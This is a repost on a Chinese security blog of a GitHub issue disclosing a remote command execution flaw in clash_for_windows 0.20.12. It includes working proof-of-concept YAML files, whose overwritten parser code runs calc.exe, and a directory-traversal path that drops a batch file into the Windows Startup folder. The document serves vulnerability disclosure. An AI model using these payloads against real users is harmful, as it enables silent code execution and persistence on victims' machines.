【漏洞速递 | 附EXP】Clash 最新 RCE漏洞
2023-1-15 11:46:21 Author: 渗透Xiao白帽(查看原文) 阅读量:117 收藏 
文章来源 https://github.com/Fndroid/clash_for_windows_pkg/issues/3891

软件版本

0.20.12

操作系统

Windows x64

系统版本

Windows 11

问题描述

Windows 上的 clash_for_windows 在 0.20.12 在订阅一个恶意链接时存在远程命令执行漏洞。因为对订阅文件中 rule-providers 的 path 的不安全处理导致 cfw-setting.yaml 会被覆盖,cfw-setting.yaml 中 parsers 的 js代码将会被执行。

A remote command execution vulnerability exists in clash_for_windows on Windows 0.20.12 when subscribing to an attacker's link. cfw-setting.yaml can be overwritten due to unsafe processing of the path of rule-providers in the subscription file, and the js code of parsers in cfw-setting.yaml will be executed.

复现步骤

PoC

  1. The attacker starts a web service to ensure that these two files can be accessed:

config.yaml

port: 7890socks-port: 7891allow-lan: truemode: Rulelog-level: infoexternal-controller: :9090proxies:  - name: a    type: socks5    server: 127.0.0.1    port: "17938"    skip-cert-verify: true
rule-providers:  p:    type: http    behavior: domain    url: "http://this.your.url/cfw-settings.yaml"    path: ./cfw-settings.yaml    interval: 86400

cfw-settings.yaml

payload:  - DOMAIN-SUFFIX,acl4.ssr,全球直连showNewVersionIcon: truehideAfterStartup: falserandomControllerPort: truerunTimeFormat: "hh : mm : ss"trayOrders:  - - icon  - - status    - traffic    - texthideTrayIcon: falseconnShowProcess: trueshowTrayProxyDelayIndicator: trueprofileParsersText: >-  parsers:    - reg: .*      code:         module.exports.parse = async (raw, { axios, yaml, notify, console }, { name, url, interval, selected }) => {          require("child_process").exec("calc.exe");          return raw;          }

  1. Victim uses subscription link

  2. restart the clash_for_windows_pkg

  3. Update subscriptions or import new subscriptions

日志文件

No response

其他补充

由于是rule-providers的自定义path的问题,还有其他利用方式,比如用目录穿越写入开机启动项
path: ../../../../../../Users/User/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/hack.bat
不过杀毒软件会弹框

Since it is a problem with the custom path of rule-providers, there are other ways to use it, such as using directory traversal to write into the startup item
path: ../../../../../../Users/User/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/hack.bat
But the antivirus software will warn.

文章来源:洛米唯熊

仅用于学习交流,不得用于非法用途

如侵权请私聊公众号删文


文章来源: http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247495550&idx=1&sn=f2dd45b6d337f8a6abca3ebc4697f3e8&chksm=ea341024dd4399327d01783ebfc2bce2352315c924f2972eb28a4dc957bc27642e88cba73a80#rd
如有侵权请联系:admin#unsafe.sh